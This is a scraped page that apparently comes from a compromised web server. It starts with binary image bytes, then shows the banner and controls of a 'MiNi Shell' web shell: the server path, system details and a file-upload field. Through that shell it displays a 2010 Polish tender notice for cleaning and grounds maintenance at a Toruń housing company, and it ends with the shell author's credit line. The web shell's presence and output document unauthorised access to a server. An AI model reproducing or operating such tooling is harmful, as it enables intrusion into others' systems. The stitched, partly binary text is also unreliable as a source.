JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101122/378004-N-2010.html

<p class="kh_header"><b>Toruń: Świadczenie usług w zakresie utrzymywania czystości i porządku w obrębie nieruchomości stanowiących zasób Toruńskiego TBS Sp. z o.o.</b><br>
<b>Numer ogłoszenia: 378004 - 2010; data zamieszczenia: 22.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Toruńskie Towarzystwo Budownictwa Społecznego Sp. z o.o. , ul. Czarlińskiego 16, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6528288, faks 056 6528288.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie utrzymywania czystości i porządku w obrębie nieruchomości stanowiących zasób Toruńskiego TBS Sp. z o.o..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia obejmuje kompleksowe sprzątanie powierzchni wewnątrz budynków, terenów zewnętrznych oraz utrzymanie zieleni na terenie wokół budynków Toruńskiego TBS Sp. z o.o. i terenach przyległych, zgodnie z ustawą z dnia 13 września  1996r. o utrzymaniu czystości i porządku w gminach.
Zakres przedmiotu zamówienia został podzielony na 2 części - Zadanie nr 1 i Zadanie nr 2 zgodnie z załącznikiem nr 2.
Ofertę można złożyć na każde zadanie oddzielnie lub na obydwa zadania łącznie.
1. Sprzątanie wewnątrz budynków:
- utrzymywanie w stałej czystości korytarzy piwnicznych, wiatrołapów, podestów wejściowych do klatek schodowych oraz schodów do piwnic,
- utrzymywanie w stałej czystości gablot i tablic ogłoszeniowych, drzwi zewnętrznych i wewnętrznych do budynków (wiatrołapy), 
- mycie okien we wiatrołapach i ciągach piwnicznych (minimum jeden raz w roku),
- przeprowadzanie deratyzacji i dezynfekcji zgodnie z obowiązującymi przepisami w terminach uzgodnionych z Zamawiającym,
- bieżącą wymianę żarówek dostarczanych przez Zamawiającego.
2. Sprzątanie terenów zewnętrznych:
- utrzymywanie w stałej czystości chodników, podwórek, placów zabaw, piaskownic, pieszojezdni, parkingów wewnętrznych, miejsc gromadzenia odpadków stałych na terenie TBS Sp. z o.o. i terenach przyległych zgodnie z ustawą z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach,
- usuwanie trawy i chwastów z chodników, dojść do budynków, opasek wokół budynków i osłon śmietnikowych,
- usuwanie nieczystości i utrzymywanie w należytym porządku kratek przed wejściami do budynków, wpustów na parkingach, odwodnień liniowych oraz rewizji przy rurach spustowych,
- dostarczanie i wymiana piasku w piaskownicach do 15 maja każdego roku, oraz jego uzupełnianie w zależności od potrzeb - lokalizacja piaskownik - załącznik nr 7 do SIWZ,
- usuwanie wszelkich oblodzeń oraz sopli, 
- odśnieżanie i usuwanie śliskości z chodników, pieszojezdni, dróg wewnętrznych, parkingów oraz chodników przyległych do terenów TBS Sp. z o.o. wg potrzeb, przy użyciu własnego piasku lub innych skutecznych środków oraz sprzętu - we wszystkie dni tygodnia,
- w przypadku opadów śniegu w nocy wymagane jest odśnieżenie i usunięcie śliskości chodników i pieszojezdni do godz. 10.00 przy czym nie później niż do godz. 7.00 na szerokość umożliwiającą komunikację pieszych w dwóch kierunkach,
- usypywanie śniegu w pryzmy oraz jego wywóz wg potrzeb,
- w przypadku znacznych opadów śniegu Zamawiający wymaga, aby odśnieżanie dróg i pieszojezdni odbywało się przy pomocy sprzętu mechanicznego takiego jak np.: pług, odśnieżarka spalinowa  
3. Utrzymanie terenów zielonych:
- koszenie trawy wg potrzeb oraz jej wywóz w terminie nie dłuższym niż 1 dzień od skoszenia,,
- nawożenie trawników raz w roku na wiosnę oraz uzupełnianie trawy wg potrzeb,
- oczyszczanie terenów zielonych z zanieczyszczeń (butelki, papiery, odpady domowe),
- odchwaszczanie terenów zielonych, obrzeży chodników i trawników wg potrzeb, przy użyciu własnych środków mechanicznych lub chemicznych,
- w okresie wegetacyjnym w przypadkach długotrwałej suszy podlewanie trawników i pozostałych roślin własnym sprzętem,
- pielęgnacja drzew i żywopłotów w okresie wegetacyjnym, przycinanie wraz z utylizacją ściętych pędów i gałęzi,
- grabienie liści i ich wywóz wg potrzeb,
- sadzenie drzew i krzewów na dodatkowe zlecenie Zamawiającego wg czynników cenotwórczych podanych w formularzu ofertowym.

Roboty związane z pielęgnacją zieleni a w szczególności przycinanie drzew i krzewów powinny być wykonywane przez osoby posiadające odpowiednie kwalifikacje i uprawnienia.
 
4. Inne czynności objęte postępowaniem:
- dostarczanie najemcom wszelkiej korespondencji kierowanej przez Zamawiającego (za potwierdzeniem odbioru),
- wywieszanie flag dostarczanych przez Zamawiającego z okazji świąt państwowych oraz innych uroczystości,
- kompleksowe sprzątanie (jeden raz w tygodniu) pomieszczeń biurowych Spółki o pow. 105,6 m2 w budynku przy ul. Czarlińskiego 16, w tym mycie okien, parapetów, drzwi wewnętrznych i zewnętrznych minimum 2 razy w roku,
- kontrolowanie pracy pompowni ścieków oraz bieżąca obsługa separatora i osadnika kanalizacji deszczowej na osiedlu mieszkaniowym w Lubiczu - zgodnie z instrukcją obsługi,
- zgłaszanie Zamawiającemu wszelkich aktów wandalizmu, dewastacji mienia, zauważonych w budynkach oraz na terenach zewnętrznych usterek. 

Wykonawca ma obowiązek do zapoznania się z obowiązującymi przepisami przeciwpożarowymi, przepisami dotyczącymi ochrony środowiska oraz do ich stosowania przy wykonywaniu zleconych czynności.

Wykonawca we własnym zakresie będzie się zaopatrywał we wszelkiego rodzaju materiały, środki chemiczne oraz narzędzia niezbędne do wykonania przedmiotu zamówienia.

Nieruchomości objęte zamówieniem wraz z ich powierzchniami wykazane są w Załączniku nr 2 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielanie zamówień uzupełniających zgodnie z art. 67 ust 1 pkt 6 ustawy Pzp. stanowiących nie więcej niż 20% wartości zamówienia. Zamówienia uzupełniające będą polegać na powtórzeniu tego samego rodzaju zamówienia, co objęte niniejszym postępowaniem.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8, 90.91.13.00-9, 90.91.40.00-7, 90.91.80.00-5, 90.62.00.00-9, 77.31.40.00-4, 77.31.41.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie warunku posiadania wiedzy i doświadczenia jeżeli Wykonawca wykaże, że zrealizował w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie 2 usługi o podobnym charakterze.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie warunku jeżeli Wykonawca wykaże, że posiada własny lub użyczony sprzęt do realizacji przedmiotu zamówienia taki jak: samochód o ładowności minimum 1,5 tony, kosiarki ręczne lub samojezdne, piły spalinowe, pługi do odśnieżania, odśnieżarki spalinowe.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie warunku jeżeli Wykonawca wykaże, że posiada 
      ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności   
      związanej z przedmiotem zamówienia, z sumą gwarancyjną nie mniejszą niż 
     200 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>I. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą nie później niż na dzień składania ofert, spełnienie warunków o których mowa w art. 22 ust. 1 i SIWZ.
II. Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu zostaną wykluczeni z postępowania. Oferta Wykonawcy wykluczonego uznana zostanie za odrzuconą.
III. Z udziału w niniejszym postępowaniu wyklucza się również Wykonawców, którzy podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 (ustawy).
IV. Ocena spełnienia wyżej wymienionych warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty i oświadczenia złożone w postępowaniu przez Wykonawcę. 
V. Zamawiający wezwie Wykonawców, którzy nie złożyli wymaganych przez Zamawiającego oświadczeń i dokumentów o których mowa w art. 25 ust. 1 (ustawy) oraz nie złożyli pełnomocnictw, lub którzy złożyli oświadczenia i dokumenty zawierające błędy, lub złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ttbs.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekretariat Toruńskiego TBS Sp. z o.o. w Toruniu ul. Czarlińskiego 16.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2010 godzina 10:00, miejsce: Sekretariat Toruńskiego TBS Sp. z o.o. w Toruniu ul. Czarlińskiego 16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com